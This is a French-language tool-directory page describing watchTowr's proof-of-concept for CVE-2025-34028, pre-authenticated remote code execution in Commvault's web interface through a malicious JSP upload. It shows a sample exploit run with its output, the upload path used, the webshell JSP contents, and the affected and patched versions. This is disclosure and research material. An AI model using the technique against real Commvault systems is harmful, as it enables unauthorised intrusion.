Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028 — Exploit de preuve de concept pour CVE-2025-34028, démontrant une exécution de code à distance pré-authentifiée sur les interfaces web de Commvault via un téléchargement JSP malveillant. | Kitploit
Outils/GitHubGitHub/watchtowrlabs/watchtowr-vs-commvault-preauth-rce-cve-2025-34028
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubwatchtowrlabs/watchtowr-vs-commvault-preauth-rce-cve-2025-34028

watchTowr-vs-Commvault-PreAuth-RCE-CVE-2025-34028

Exploit de preuve de concept pour CVE-2025-34028, démontrant une exécution de code à distance pré-authentifiée sur les interfaces web de Commvault via un téléchargement JSP malveillant.

Voir le dépôt
2192il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-34028

Une preuve de concept d'exécution de code à distance sans authentification pour Commvault

Consultez notre article de blog pour les détails techniques

Détection en action

root@kitploit:~
 python watchtowr-vs-commvault-rce-CVE-2025-34028.py --url https://192.168.1.1
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchtowr-vs-commvault-rce-CVE-2025-34028.py
        (*) Commvault Unauthenticated Remote Code Execution (CVE-2025-34028) POC by watchTowr
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2025-34028]
        
[*] Targeting https://192.168.1.1
[*] Verifying presence of Commvault
[*] Uploading to  /reports/MetricsUpload/2GfMIJdK/
[*] Fetching System User from  https://192.168.1.1/reports/MetricsUpload/2GfMIJdK/.tmp/dist-cc/dist-cc/shell.jsp
[*] System User EC2XXX-XXXXXXX$

Description

Ce script est une preuve de concept pour CVE-2025-34028, ciblant les interfaces web Commvault. En téléchargeant un fichier zip contenant un fichier .jsp permettant l'exécution de code, le fichier zip est déposé dans un répertoire accessible publiquement et l'utilisateur système est détaillé dans la réponse. Plus de détails sont fournis dans notre article de blog.

Note

Le script PoC utilise un fichier zip codé en dur contenant les fichiers suivants :

  • /ccApp/index.html
  • shell.jsp

Contenu de Shell.jsp :

root@kitploit:~
<%@ page import="java.util.*" %>
<html>
<body>
  <h3>System Information</h3>
  <p>Current User: <%= System.getProperty("user.name") %></p>
</body>
</html>

Versions affectées

  • Commvault Windows et Linux 11.38.0 - 11.38.19

Versions corrigées

  • Commvault Windows et Linux 11.38.20 à compter du 10 avril 2025
  • Commvault Windows et Linux 11.38.25 à compter du 10 avril 2025

Plus de détails sur l'avis de sécurité Commvault

Suivez watchTowr Labs

Pour les dernières recherches en sécurité, suivez l'équipe watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Télécharger l’outil